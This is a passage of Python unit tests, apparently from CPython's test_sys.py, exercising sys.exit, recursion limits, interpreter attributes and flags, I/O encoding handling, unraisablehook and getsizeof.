def test_excepthook_bytes_filename(self):
# bpo-37467: sys.excepthook() must not crash if a filename
# is a bytes string
with warnings.catch_warnings():
warnings.simplefilter('ignore', BytesWarning)
try:
raise SyntaxError("msg", (b"bytes_filename", 123, 0, "text"))
except SyntaxError as exc:
with support.captured_stderr() as err:
sys.__excepthook__(*sys.exc_info())
err = err.getvalue()
self.assertIn(""" File "b'bytes_filename'", line 123\n""", err)
self.assertIn(""" text\n""", err)
self.assertTrue(err.endswith("SyntaxError: msg\n"))
def test_excepthook(self):
with test.support.captured_output("stderr") as stderr:
sys.excepthook(1, '1', 1)
self.assertTrue("TypeError: print_exception(): Exception expected for " \
"value, str found" in stderr.getvalue())
# FIXME: testing the code for a lost or replaced excepthook in
# Python/pythonrun.c::PyErr_PrintEx() is tricky.
class SysModuleTest(unittest.TestCase):
def tearDown(self):
test.support.reap_children()
def test_exit(self):
# call with two arguments
self.assertRaises(TypeError, sys.exit, 42, 42)
# call without argument
with self.assertRaises(SystemExit) as cm:
sys.exit()
self.assertIsNone(cm.exception.code)
rc, out, err = assert_python_ok('-c', 'import sys; sys.exit()')
self.assertEqual(rc, 0)
self.assertEqual(out, b'')
self.assertEqual(err, b'')
# call with integer argument
with self.assertRaises(SystemExit) as cm:
sys.exit(42)
self.assertEqual(cm.exception.code, 42)
# call with tuple argument with one entry
# entry will be unpacked
with self.assertRaises(SystemExit) as cm:
sys.exit((42,))
self.assertEqual(cm.exception.code, 42)
# call with string argument
with self.assertRaises(SystemExit) as cm:
sys.exit("exit")
self.assertEqual(cm.exception.code, "exit")
# call with tuple argument with two entries
with self.assertRaises(SystemExit) as cm:
sys.exit((17, 23))
self.assertEqual(cm.exception.code, (17, 23))
# test that the exit machinery handles SystemExits properly
rc, out, err = assert_python_failure('-c', 'raise SystemExit(47)')
self.assertEqual(rc, 47)
self.assertEqual(out, b'')
self.assertEqual(err, b'')
def check_exit_message(code, expected, **env_vars):
rc, out, err = assert_python_failure('-c', code, **env_vars)
self.assertEqual(rc, 1)
self.assertEqual(out, b'')
self.assertTrue(err.startswith(expected),
"%s doesn't start with %s" % (ascii(err), ascii(expected)))
# test that stderr buffer is flushed before the exit message is written
# into stderr
check_exit_message(
r'import sys; sys.stderr.write("unflushed,"); sys.exit("message")',
b"unflushed,message")
# test that the exit message is written with backslashreplace error
# handler to stderr
check_exit_message(
r'import sys; sys.exit("surrogates:\uDCFF")',
b"surrogates:\\udcff")
# test that the unicode message is encoded to the stderr encoding
# instead of the default encoding (utf8)
check_exit_message(
r'import sys; sys.exit("h\xe9")',
b"h\xe9", PYTHONIOENCODING='latin-1')
def test_getdefaultencoding(self):
self.assertRaises(TypeError, sys.getdefaultencoding, 42)
# can't check more than the type, as the user might have changed it
self.assertIsInstance(sys.getdefaultencoding(), str)
# testing sys.settrace() is done in test_sys_settrace.py
# testing sys.setprofile() is done in test_sys_setprofile.py
def test_switchinterval(self):
self.assertRaises(TypeError, sys.setswitchinterval)
self.assertRaises(TypeError, sys.setswitchinterval, "a")
self.assertRaises(ValueError, sys.setswitchinterval, -1.0)
self.assertRaises(ValueError, sys.setswitchinterval, 0.0)
orig = sys.getswitchinterval()
# sanity check
self.assertTrue(orig < 0.5, orig)
try:
for n in 0.00001, 0.05, 3.0, orig:
sys.setswitchinterval(n)
self.assertAlmostEqual(sys.getswitchinterval(), n)
finally:
sys.setswitchinterval(orig)
def test_recursionlimit(self):
self.assertRaises(TypeError, sys.getrecursionlimit, 42)
oldlimit = sys.getrecursionlimit()
self.assertRaises(TypeError, sys.setrecursionlimit)
self.assertRaises(ValueError, sys.setrecursionlimit, -42)
sys.setrecursionlimit(10000)
self.assertEqual(sys.getrecursionlimit(), 10000)
sys.setrecursionlimit(oldlimit)
def test_recursionlimit_recovery(self):
if hasattr(sys, 'gettrace') and sys.gettrace():
self.skipTest('fatal error if run with a trace function')
oldlimit = sys.getrecursionlimit()
def f():
f()
try:
for depth in (10, 25, 50, 75, 100, 250, 1000):
try:
sys.setrecursionlimit(depth)
except RecursionError:
# Issue #25274: The recursion limit is too low at the
# current recursion depth
continue
# Issue #5392: test stack overflow after hitting recursion
# limit twice
self.assertRaises(RecursionError, f)
self.assertRaises(RecursionError, f)
finally:
sys.setrecursionlimit(oldlimit)
@test.support.cpython_only
def test_setrecursionlimit_recursion_depth(self):
# Issue #25274: Setting a low recursion limit must be blocked if the
# current recursion depth is already higher than the "lower-water
# mark". Otherwise, it may not be possible anymore to
# reset the overflowed flag to 0.
from _testinternalcapi import get_recursion_depth
def set_recursion_limit_at_depth(depth, limit):
recursion_depth = get_recursion_depth()
if recursion_depth >= depth:
with self.assertRaises(RecursionError) as cm:
sys.setrecursionlimit(limit)
self.assertRegex(str(cm.exception),
"cannot set the recursion limit to [0-9]+ "
"at the recursion depth [0-9]+: "
"the limit is too low")
else:
set_recursion_limit_at_depth(depth, limit)
oldlimit = sys.getrecursionlimit()
try:
sys.setrecursionlimit(1000)
for limit in (10, 25, 50, 75, 100, 150, 200):
# formula extracted from _Py_RecursionLimitLowerWaterMark()
if limit > 200:
depth = limit - 50
else:
depth = limit * 3 // 4
set_recursion_limit_at_depth(depth, limit)
finally:
sys.setrecursionlimit(oldlimit)
# The error message is specific to CPython
@test.support.cpython_only
def test_recursionlimit_fatalerror(self):
# A fatal error occurs if a second recursion limit is hit when recovering
# from a first one.
code = textwrap.dedent("""
import sys
def f():
try:
f()
except RecursionError:
f()
sys.setrecursionlimit(%d)
f()""")
with test.support.SuppressCrashReport():
for i in (50, 1000):
sub = subprocess.Popen([sys.executable, '-c', code % i],
stderr=subprocess.PIPE)
err = sub.communicate()[1]
self.assertTrue(sub.returncode, sub.returncode)
self.assertIn(
b"Fatal Python error: _Py_CheckRecursiveCall: "
b"Cannot recover from stack overflow",
err)
def test_getwindowsversion(self):
# Raise SkipTest if sys doesn't have getwindowsversion attribute
test.support.get_attribute(sys, "getwindowsversion")
v = sys.getwindowsversion()
self.assertEqual(len(v), 5)
self.assertIsInstance(v[0], int)
self.assertIsInstance(v[1], int)
self.assertIsInstance(v[2], int)
self.assertIsInstance(v[3], int)
self.assertIsInstance(v[4], str)
self.assertRaises(IndexError, operator.getitem, v, 5)
self.assertIsInstance(v.major, int)
self.assertIsInstance(v.minor, int)
self.assertIsInstance(v.build, int)
self.assertIsInstance(v.platform, int)
self.assertIsInstance(v.service_pack, str)
self.assertIsInstance(v.service_pack_minor, int)
self.assertIsInstance(v.service_pack_major, int)
self.assertIsInstance(v.suite_mask, int)
self.assertIsInstance(v.product_type, int)
self.assertEqual(v[0], v.major)
self.assertEqual(v[1], v.minor)
self.assertEqual(v[2], v.build)
self.assertEqual(v[3], v.platform)
self.assertEqual(v[4], v.service_pack)
# This is how platform.py calls it. Make sure tuple
# still has 5 elements
maj, min, buildno, plat, csd = sys.getwindowsversion()
def test_call_tracing(self):
self.assertRaises(TypeError, sys.call_tracing, type, 2)
@unittest.skipUnless(hasattr(sys, "setdlopenflags"),
'test needs sys.setdlopenflags()')
def test_dlopenflags(self):
self.assertTrue(hasattr(sys, "getdlopenflags"))
self.assertRaises(TypeError, sys.getdlopenflags, 42)
oldflags = sys.getdlopenflags()
self.assertRaises(TypeError, sys.setdlopenflags)
sys.setdlopenflags(oldflags+1)
self.assertEqual(sys.getdlopenflags(), oldflags+1)
sys.setdlopenflags(oldflags)
@test.support.refcount_test
def test_refcount(self):
# n here must be a global in order for this test to pass while
# tracing with a python function. Tracing calls PyFrame_FastToLocals
# which will add a copy of any locals to the frame object, causing
# the reference count to increase by 2 instead of 1.
global n
self.assertRaises(TypeError, sys.getrefcount)
c = sys.getrefcount(None)
n = None
self.assertEqual(sys.getrefcount(None), c+1)
del n
self.assertEqual(sys.getrefcount(None), c)
if hasattr(sys, "gettotalrefcount"):
self.assertIsInstance(sys.gettotalrefcount(), int)
def test_getframe(self):
self.assertRaises(TypeError, sys._getframe, 42, 42)
self.assertRaises(ValueError, sys._getframe, 2000000000)
self.assertTrue(
SysModuleTest.test_getframe.__code__ \
is sys._getframe().f_code
)
# sys._current_frames() is a CPython-only gimmick.
@threading_helper.reap_threads
def test_current_frames(self):
import threading
import traceback
# Spawn a thread that blocks at a known place. Then the main
# thread does sys._current_frames(), and verifies that the frames
# returned make sense.
entered_g = threading.Event()
leave_g = threading.Event()
thread_info = [] # the thread's id
def f123():
g456()
def g456():
thread_info.append(threading.get_ident())
entered_g.set()
leave_g.wait()
t = threading.Thread(target=f123)
t.start()
entered_g.wait()
# At this point, t has finished its entered_g.set(), although it's
# impossible to guess whether it's still on that line or has moved on
# to its leave_g.wait().
self.assertEqual(len(thread_info), 1)
thread_id = thread_info[0]
d = sys._current_frames()
for tid in d:
self.assertIsInstance(tid, int)
self.assertGreater(tid, 0)
main_id = threading.get_ident()
self.assertIn(main_id, d)
self.assertIn(thread_id, d)
# Verify that the captured main-thread frame is _this_ frame.
frame = d.pop(main_id)
self.assertTrue(frame is sys._getframe())
# Verify that the captured thread frame is blocked in g456, called
# from f123. This is a litte tricky, since various bits of
# threading.py are also in the thread's call stack.
frame = d.pop(thread_id)
stack = traceback.extract_stack(frame)
for i, (filename, lineno, funcname, sourceline) in enumerate(stack):
if funcname == "f123":
break
else:
self.fail("didn't find f123() on thread's call stack")
self.assertEqual(sourceline, "g456()")
# And the next record must be for g456().
filename, lineno, funcname, sourceline = stack[i+1]
self.assertEqual(funcname, "g456")
self.assertIn(sourceline, ["leave_g.wait()", "entered_g.set()"])
# Reap the spawned thread.
leave_g.set()
t.join()
def test_attributes(self):
self.assertIsInstance(sys.api_version, int)
self.assertIsInstance(sys.argv, list)
for arg in sys.argv:
self.assertIsInstance(arg, str)
self.assertIsInstance(sys.orig_argv, list)
for arg in sys.orig_argv:
self.assertIsInstance(arg, str)
self.assertIn(sys.byteorder, ("little", "big"))
self.assertIsInstance(sys.builtin_module_names, tuple)
self.assertIsInstance(sys.copyright, str)
self.assertIsInstance(sys.exec_prefix, str)
self.assertIsInstance(sys.base_exec_prefix, str)
self.assertIsInstance(sys.executable, str)
self.assertEqual(len(sys.float_info), 11)
self.assertEqual(sys.float_info.radix, 2)
self.assertEqual(len(sys.int_info), 2)
self.assertTrue(sys.int_info.bits_per_digit % 5 == 0)
self.assertTrue(sys.int_info.sizeof_digit >= 1)
self.assertEqual(type(sys.int_info.bits_per_digit), int)
self.assertEqual(type(sys.int_info.sizeof_digit), int)
self.assertIsInstance(sys.hexversion, int)
self.assertEqual(len(sys.hash_info), 9)
self.assertLess(sys.hash_info.modulus, 2**sys.hash_info.width)
# sys.hash_info.modulus should be a prime; we do a quick
# probable primality test (doesn't exclude the possibility of
# a Carmichael number)
for x in range(1, 100):
self.assertEqual(
pow(x, sys.hash_info.modulus-1, sys.hash_info.modulus),
1,
"sys.hash_info.modulus {} is a non-prime".format(
sys.hash_info.modulus)
)
self.assertIsInstance(sys.hash_info.inf, int)
self.assertIsInstance(sys.hash_info.nan, int)
self.assertIsInstance(sys.hash_info.imag, int)
algo = sysconfig.get_config_var("Py_HASH_ALGORITHM")
if sys.hash_info.algorithm in {"fnv", "siphash24"}:
self.assertIn(sys.hash_info.hash_bits, {32, 64})
self.assertIn(sys.hash_info.seed_bits, {32, 64, 128})
if algo == 1:
self.assertEqual(sys.hash_info.algorithm, "siphash24")
elif algo == 2:
self.assertEqual(sys.hash_info.algorithm, "fnv")
else:
self.assertIn(sys.hash_info.algorithm, {"fnv", "siphash24"})
else:
# PY_HASH_EXTERNAL
self.assertEqual(algo, 0)
self.assertGreaterEqual(sys.hash_info.cutoff, 0)
self.assertLess(sys.hash_info.cutoff, 8)
self.assertIsInstance(sys.maxsize, int)
self.assertIsInstance(sys.maxunicode, int)
self.assertEqual(sys.maxunicode, 0x10FFFF)
self.assertIsInstance(sys.platform, str)
self.assertIsInstance(sys.prefix, str)
self.assertIsInstance(sys.base_prefix, str)
self.assertIsInstance(sys.platlibdir, str)
self.assertIsInstance(sys.version, str)
vi = sys.version_info
self.assertIsInstance(vi[:], tuple)
self.assertEqual(len(vi), 5)
self.assertIsInstance(vi[0], int)
self.assertIsInstance(vi[1], int)
self.assertIsInstance(vi[2], int)
self.assertIn(vi[3], ("alpha", "beta", "candidate", "final"))
self.assertIsInstance(vi[4], int)
self.assertIsInstance(vi.major, int)
self.assertIsInstance(vi.minor, int)
self.assertIsInstance(vi.micro, int)
self.assertIn(vi.releaselevel, ("alpha", "beta", "candidate", "final"))
self.assertIsInstance(vi.serial, int)
self.assertEqual(vi[0], vi.major)
self.assertEqual(vi[1], vi.minor)
self.assertEqual(vi[2], vi.micro)
self.assertEqual(vi[3], vi.releaselevel)
self.assertEqual(vi[4], vi.serial)
self.assertTrue(vi > (1,0,0))
self.assertIsInstance(sys.float_repr_style, str)
self.assertIn(sys.float_repr_style, ('short', 'legacy'))
if not sys.platform.startswith('win'):
self.assertIsInstance(sys.abiflags, str)
def test_thread_info(self):
info = sys.thread_info
self.assertEqual(len(info), 3)
self.assertIn(info.name, ('nt', 'pthread', 'solaris', None))
self.assertIn(info.lock, ('semaphore', 'mutex+cond', None))
def test_43581(self):
# Can't use sys.stdout, as this is a StringIO object when
# the test runs under regrtest.
self.assertEqual(sys.__stdout__.encoding, sys.__stderr__.encoding)
def test_intern(self):
global INTERN_NUMRUNS
INTERN_NUMRUNS += 1
self.assertRaises(TypeError, sys.intern)
s = "never interned before" + str(INTERN_NUMRUNS)
self.assertTrue(sys.intern(s) is s)
s2 = s.swapcase().swapcase()
self.assertTrue(sys.intern(s2) is s)
# Subclasses of string can't be interned, because they
# provide too much opportunity for insane things to happen.
# We don't want them in the interned dict and if they aren't
# actually interned, we don't want to create the appearance
# that they are by allowing intern() to succeed.
class S(str):
def __hash__(self):
return 123
self.assertRaises(TypeError, sys.intern, S("abc"))
def test_sys_flags(self):
self.assertTrue(sys.flags)
attrs = ("debug",
"inspect", "interactive", "optimize",
"dont_write_bytecode", "no_user_site", "no_site",
"ignore_environment", "verbose", "bytes_warning", "quiet",
"hash_randomization", "isolated", "dev_mode", "utf8_mode")
for attr in attrs:
self.assertTrue(hasattr(sys.flags, attr), attr)
attr_type = bool if attr == "dev_mode" else int
self.assertEqual(type(getattr(sys.flags, attr)), attr_type, attr)
self.assertTrue(repr(sys.flags))
self.assertEqual(len(sys.flags), len(attrs))
self.assertIn(sys.flags.utf8_mode, {0, 1, 2})
def assert_raise_on_new_sys_type(self, sys_attr):
# Users are intentionally prevented from creating new instances of
# sys.flags, sys.version_info, and sys.getwindowsversion.
attr_type = type(sys_attr)
with self.assertRaises(TypeError):
attr_type()
with self.assertRaises(TypeError):
attr_type.__new__(attr_type)
def test_sys_flags_no_instantiation(self):
self.assert_raise_on_new_sys_type(sys.flags)
def test_sys_version_info_no_instantiation(self):
self.assert_raise_on_new_sys_type(sys.version_info)
def test_sys_getwindowsversion_no_instantiation(self):
# Skip if not being run on Windows.
test.support.get_attribute(sys, "getwindowsversion")
self.assert_raise_on_new_sys_type(sys.getwindowsversion())
@test.support.cpython_only
def test_clear_type_cache(self):
sys._clear_type_cache()
def test_ioencoding(self):
env = dict(os.environ)
# Test character: cent sign, encoded as 0x4A (ASCII J) in CP424,
# not representable in ASCII.
env["PYTHONIOENCODING"] = "cp424"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout = subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
expected = ("\xa2" + os.linesep).encode("cp424")
self.assertEqual(out, expected)
env["PYTHONIOENCODING"] = "ascii:replace"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout = subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
self.assertEqual(out, b'?')
env["PYTHONIOENCODING"] = "ascii"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
env=env)
out, err = p.communicate()
self.assertEqual(out, b'')
self.assertIn(b'UnicodeEncodeError:', err)
self.assertIn(rb"'\xa2'", err)
env["PYTHONIOENCODING"] = "ascii:"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
env=env)
out, err = p.communicate()
self.assertEqual(out, b'')
self.assertIn(b'UnicodeEncodeError:', err)
self.assertIn(rb"'\xa2'", err)
env["PYTHONIOENCODING"] = ":surrogateescape"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xdcbd))'],
stdout=subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
self.assertEqual(out, b'\xbd')
@unittest.skipUnless(os_helper.FS_NONASCII,
'requires OS support of non-ASCII encodings')
@unittest.skipUnless(sys.getfilesystemencoding() == locale.getpreferredencoding(False),
'requires FS encoding to match locale')
def test_ioencoding_nonascii(self):
env = dict(os.environ)
env["PYTHONIOENCODING"] = ""
p = subprocess.Popen([sys.executable, "-c",
'print(%a)' % os_helper.FS_NONASCII],
stdout=subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
self.assertEqual(out, os.fsencode(os_helper.FS_NONASCII))
@unittest.skipIf(sys.base_prefix != sys.prefix,
'Test is not venv-compatible')
def test_executable(self):
# sys.executable should be absolute
self.assertEqual(os.path.abspath(sys.executable), sys.executable)
# Issue #7774: Ensure that sys.executable is an empty string if argv[0]
# has been set to a non existent program name and Python is unable to
# retrieve the real program name
# For a normal installation, it should work without 'cwd'
# argument. For test runs in the build directory, see #7774.
python_dir = os.path.dirname(os.path.realpath(sys.executable))
p = subprocess.Popen(
["nonexistent", "-c",
'import sys; print(sys.executable.encode("ascii", "backslashreplace"))'],
executable=sys.executable, stdout=subprocess.PIPE, cwd=python_dir)
stdout = p.communicate()[0]
executable = stdout.strip().decode("ASCII")
p.wait()
self.assertIn(executable, ["b''", repr(sys.executable.encode("ascii", "backslashreplace"))])
def check_fsencoding(self, fs_encoding, expected=None):
self.assertIsNotNone(fs_encoding)
codecs.lookup(fs_encoding)
if expected:
self.assertEqual(fs_encoding, expected)
def test_getfilesystemencoding(self):
fs_encoding = sys.getfilesystemencoding()
if sys.platform == 'darwin':
expected = 'utf-8'
else:
expected = None
self.check_fsencoding(fs_encoding, expected)
def c_locale_get_error_handler(self, locale, isolated=False, encoding=None):
# Force the POSIX locale
env = os.environ.copy()
env["LC_ALL"] = locale
env["PYTHONCOERCECLOCALE"] = "0"
code = '\n'.join((
'import sys',
'def dump(name):',
' std = getattr(sys, name)',
' print("%s: %s" % (name, std.errors))',
'dump("stdin")',
'dump("stdout")',
'dump("stderr")',
))
args = [sys.executable, "-X", "utf8=0", "-c", code]
if isolated:
args.append("-I")
if encoding is not None:
env['PYTHONIOENCODING'] = encoding
else:
env.pop('PYTHONIOENCODING', None)
p = subprocess.Popen(args,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
env=env,
universal_newlines=True)
stdout, stderr = p.communicate()
return stdout
def check_locale_surrogateescape(self, locale):
out = self.c_locale_get_error_handler(locale, isolated=True)
self.assertEqual(out,
'stdin: surrogateescape\n'
'stdout: surrogateescape\n'
'stderr: backslashreplace\n')
# replace the default error handler
out = self.c_locale_get_error_handler(locale, encoding=':ignore')
self.assertEqual(out,
'stdin: ignore\n'
'stdout: ignore\n'
'stderr: backslashreplace\n')
# force the encoding
out = self.c_locale_get_error_handler(locale, encoding='iso8859-1')
self.assertEqual(out,
'stdin: strict\n'
'stdout: strict\n'
'stderr: backslashreplace\n')
out = self.c_locale_get_error_handler(locale, encoding='iso8859-1:')
self.assertEqual(out,
'stdin: strict\n'
'stdout: strict\n'
'stderr: backslashreplace\n')
# have no any effect
out = self.c_locale_get_error_handler(locale, encoding=':')
self.assertEqual(out,
'stdin: surrogateescape\n'
'stdout: surrogateescape\n'
'stderr: backslashreplace\n')
out = self.c_locale_get_error_handler(locale, encoding='')
self.assertEqual(out,
'stdin: surrogateescape\n'
'stdout: surrogateescape\n'
'stderr: backslashreplace\n')
def test_c_locale_surrogateescape(self):
self.check_locale_surrogateescape('C')
def test_posix_locale_surrogateescape(self):
self.check_locale_surrogateescape('POSIX')
def test_implementation(self):
# This test applies to all implementations equally.
levels = {'alpha': 0xA, 'beta': 0xB, 'candidate': 0xC, 'final': 0xF}
self.assertTrue(hasattr(sys.implementation, 'name'))
self.assertTrue(hasattr(sys.implementation, 'version'))
self.assertTrue(hasattr(sys.implementation, 'hexversion'))
self.assertTrue(hasattr(sys.implementation, 'cache_tag'))
version = sys.implementation.version
self.assertEqual(version[:2], (version.major, version.minor))
hexversion = (version.major << 24 | version.minor << 16 |
version.micro << 8 | levels[version.releaselevel] << 4 |
version.serial << 0)
self.assertEqual(sys.implementation.hexversion, hexversion)
# PEP 421 requires that .name be lower case.
self.assertEqual(sys.implementation.name,
sys.implementation.name.lower())
@test.support.cpython_only
def test_debugmallocstats(self):
# Test sys._debugmallocstats()
from test.support.script_helper import assert_python_ok
args = ['-c', 'import sys; sys._debugmallocstats()']
ret, out, err = assert_python_ok(*args)
self.assertIn(b"free PyDictObjects", err)
# The function has no parameter
self.assertRaises(TypeError, sys._debugmallocstats, True)
@unittest.skipUnless(hasattr(sys, "getallocatedblocks"),
"sys.getallocatedblocks unavailable on this build")
def test_getallocatedblocks(self):
try:
import _testcapi
except ImportError:
with_pymalloc = support.with_pymalloc()
else:
try:
alloc_name = _testcapi.pymem_getallocatorsname()
except RuntimeError as exc:
# "cannot get allocators name" (ex: tracemalloc is used)
with_pymalloc = True
else:
with_pymalloc = (alloc_name in ('pymalloc', 'pymalloc_debug'))
# Some sanity checks
a = sys.getallocatedblocks()
self.assertIs(type(a), int)
if with_pymalloc:
self.assertGreater(a, 0)
else:
# When WITH_PYMALLOC isn't available, we don't know anything
# about the underlying implementation: the function might
# return 0 or something greater.
self.assertGreaterEqual(a, 0)
try:
# While we could imagine a Python session where the number of
# multiple buffer objects would exceed the sharing of references,
# it is unlikely to happen in a normal test run.
self.assertLess(a, sys.gettotalrefcount())
except AttributeError:
# gettotalrefcount() not available
pass
gc.collect()
b = sys.getallocatedblocks()
self.assertLessEqual(b, a)
gc.collect()
c = sys.getallocatedblocks()
self.assertIn(c, range(b - 50, b + 50))
def test_is_finalizing(self):
self.assertIs(sys.is_finalizing(), False)
# Don't use the atexit module because _Py_Finalizing is only set
# after calling atexit callbacks
code = """if 1:
import sys
class AtExit:
is_finalizing = sys.is_finalizing
print = print
def __del__(self):
self.print(self.is_finalizing(), flush=True)
# Keep a reference in the __main__ module namespace, so the
# AtExit destructor will be called at Python exit
ref = AtExit()
"""
rc, stdout, stderr = assert_python_ok('-c', code)
self.assertEqual(stdout.rstrip(), b'True')
def test_issue20602(self):
# sys.flags and sys.float_info were wiped during shutdown.
code = """if 1:
import sys
class A:
def __del__(self, sys=sys):
print(sys.flags)
print(sys.float_info)
a = A()
"""
rc, out, err = assert_python_ok('-c', code)
out = out.splitlines()
self.assertIn(b'sys.flags', out[0])
self.assertIn(b'sys.float_info', out[1])
def test_sys_ignores_cleaning_up_user_data(self):
code = """if 1:
import struct, sys
class C:
def __init__(self):
self.pack = struct.pack
def __del__(self):
self.pack('I', -42)
sys.x = C()
"""
rc, stdout, stderr = assert_python_ok('-c', code)
self.assertEqual(rc, 0)
self.assertEqual(stdout.rstrip(), b"")
self.assertEqual(stderr.rstrip(), b"")
@unittest.skipUnless(hasattr(sys, 'getandroidapilevel'),
'need sys.getandroidapilevel()')
def test_getandroidapilevel(self):
level = sys.getandroidapilevel()
self.assertIsInstance(level, int)
self.assertGreater(level, 0)
def test_sys_tracebacklimit(self):
code = """if 1:
import sys
def f1():
1 / 0
def f2():
f1()
sys.tracebacklimit = %r
f2()
"""
def check(tracebacklimit, expected):
p = subprocess.Popen([sys.executable, '-c', code % tracebacklimit],
stderr=subprocess.PIPE)
out = p.communicate()[1]
self.assertEqual(out.splitlines(), expected)
traceback = [
b'Traceback (most recent call last):',
b' File "<string>", line 8, in <module>',
b' File "<string>", line 6, in f2',
b' File "<string>", line 4, in f1',
b'ZeroDivisionError: division by zero'
]
check(10, traceback)
check(3, traceback)
check(2, traceback[:1] + traceback[2:])
check(1, traceback[:1] + traceback[3:])
check(0, [traceback[-1]])
check(-1, [traceback[-1]])
check(1<<1000, traceback)
check(-1<<1000, [traceback[-1]])
check(None, traceback)
def test_no_duplicates_in_meta_path(self):
self.assertEqual(len(sys.meta_path), len(set(sys.meta_path)))
@unittest.skipUnless(hasattr(sys, "_enablelegacywindowsfsencoding"),
'needs sys._enablelegacywindowsfsencoding()')
def test__enablelegacywindowsfsencoding(self):
code = ('import sys',
'sys._enablelegacywindowsfsencoding()',
'print(sys.getfilesystemencoding(), sys.getfilesystemencodeerrors())')
rc, out, err = assert_python_ok('-c', '; '.join(code))
out = out.decode('ascii', 'replace').rstrip()
self.assertEqual(out, 'mbcs replace')
def test_orig_argv(self):
code = textwrap.dedent('''
import sys
print(sys.argv)
print(sys.orig_argv)
''')
args = [sys.executable, '-I', '-X', 'utf8', '-c', code, 'arg']
proc = subprocess.run(args, check=True, capture_output=True, text=True)
expected = [
repr(['-c', 'arg']), # sys.argv
repr(args), # sys.orig_argv
]
self.assertEqual(proc.stdout.rstrip().splitlines(), expected,
proc)
@test.support.cpython_only
class UnraisableHookTest(unittest.TestCase):
def write_unraisable_exc(self, exc, err_msg, obj):
import _testcapi
import types
err_msg2 = f"Exception ignored {err_msg}"
try:
_testcapi.write_unraisable_exc(exc, err_msg, obj)
return types.SimpleNamespace(exc_type=type(exc),
exc_value=exc,
exc_traceback=exc.__traceback__,
err_msg=err_msg2,
object=obj)
finally:
# Explicitly break any reference cycle
exc = None
def test_original_unraisablehook(self):
for err_msg in (None, "original hook"):
with self.subTest(err_msg=err_msg):
obj = "an object"
with test.support.captured_output("stderr") as stderr:
with test.support.swap_attr(sys, 'unraisablehook',
sys.__unraisablehook__):
self.write_unraisable_exc(ValueError(42), err_msg, obj)
err = stderr.getvalue()
if err_msg is not None:
self.assertIn(f'Exception ignored {err_msg}: {obj!r}\n', err)
else:
self.assertIn(f'Exception ignored in: {obj!r}\n', err)
self.assertIn('Traceback (most recent call last):\n', err)
self.assertIn('ValueError: 42\n', err)
def test_original_unraisablehook_err(self):
# bpo-22836: PyErr_WriteUnraisable() should give sensible reports
class BrokenDel:
def __del__(self):
exc = ValueError("del is broken")
# The following line is included in the traceback report:
raise exc
class BrokenStrException(Exception):
def __str__(self):
raise Exception("str() is broken")
class BrokenExceptionDel:
def __del__(self):
exc = BrokenStrException()
# The following line is included in the traceback report:
raise exc
for test_class in (BrokenDel, BrokenExceptionDel):
with self.subTest(test_class):
obj = test_class()
with test.support.captured_stderr() as stderr, \
test.support.swap_attr(sys, 'unraisablehook',
sys.__unraisablehook__):
# Trigger obj.__del__()
del obj
report = stderr.getvalue()
self.assertIn("Exception ignored", report)
self.assertIn(test_class.__del__.__qualname__, report)
self.assertIn("test_sys.py", report)
self.assertIn("raise exc", report)
if test_class is BrokenExceptionDel:
self.assertIn("BrokenStrException", report)
self.assertIn("<exception str() failed>", report)
else:
self.assertIn("ValueError", report)
self.assertIn("del is broken", report)
self.assertTrue(report.endswith("\n"))
def test_original_unraisablehook_wrong_type(self):
exc = ValueError(42)
with test.support.swap_attr(sys, 'unraisablehook',
sys.__unraisablehook__):
with self.assertRaises(TypeError):
sys.unraisablehook(exc)
def test_custom_unraisablehook(self):
hook_args = None
def hook_func(args):
nonlocal hook_args
hook_args = args
obj = object()
try:
with test.support.swap_attr(sys, 'unraisablehook', hook_func):
expected = self.write_unraisable_exc(ValueError(42),
"custom hook", obj)
for attr in "exc_type exc_value exc_traceback err_msg object".split():
self.assertEqual(getattr(hook_args, attr),
getattr(expected, attr),
(hook_args, expected))
finally:
# expected and hook_args contain an exception: break reference cycle
expected = None
hook_args = None
def test_custom_unraisablehook_fail(self):
def hook_func(*args):
raise Exception("hook_func failed")
with test.support.captured_output("stderr") as stderr:
with test.support.swap_attr(sys, 'unraisablehook', hook_func):
self.write_unraisable_exc(ValueError(42),
"custom hook fail", None)
err = stderr.getvalue()
self.assertIn(f'Exception ignored in sys.unraisablehook: '
f'{hook_func!r}\n',
err)
self.assertIn('Traceback (most recent call last):\n', err)
self.assertIn('Exception: hook_func failed\n', err)
@test.support.cpython_only
class SizeofTest(unittest.TestCase):
def setUp(self):
self.P = struct.calcsize('P')
self.longdigit = sys.int_info.sizeof_digit
import _testinternalcapi
self.gc_headsize = _testinternalcapi.SIZEOF_PYGC_HEAD
check_sizeof = test.support.check_sizeof
def test_gc_head_size(self):
# Check that the gc header size is added to objects tracked by the gc.
vsize = test.support.calcvobjsize
gc_header_size = self.gc_headsize
# bool objects are not gc tracked
self.assertEqual(sys.getsizeof(True), vsize('') + self.longdigit)
# but lists are
self.assertEqual(sys.getsizeof([]), vsize('Pn') + gc_header_size)
def test_errors(self):
class BadSizeof:
def __sizeof__(self):
raise ValueError
self.assertRaises(ValueError, sys.getsizeof, BadSizeof())
class InvalidSizeof:
def __sizeof__(self):
return None
self.assertRaises(TypeError, sys.getsizeof, InvalidSizeof())
sentinel = ["sentinel"]
self.assertIs(sys.getsizeof(InvalidSizeof(), sentinel), sentinel)
class FloatSizeof:
def __sizeof__(self):
return 4.5
self.assertRaises(TypeError, sys.getsizeof, FloatSizeof())
self.assertIs(sys.getsizeof(FloatSizeof(), sentinel), sentinel)
class OverflowSizeof(int):
def __sizeof__(self):
return int(self)
self.assertEqual(sys.getsizeof(OverflowSizeof(sys.maxsize)),
sys.maxsize + self.gc_headsize)
with self.assertRaises(OverflowError):
sys.getsizeof(OverflowSizeof(sys.maxsize + 1))
with self.assertRaises(ValueError):
sys.getsizeof(OverflowSizeof(-1))
with self.assertRaises((ValueError, OverflowError)):
sys.getsizeof(OverflowSizeof(-sys.maxsize - 1))
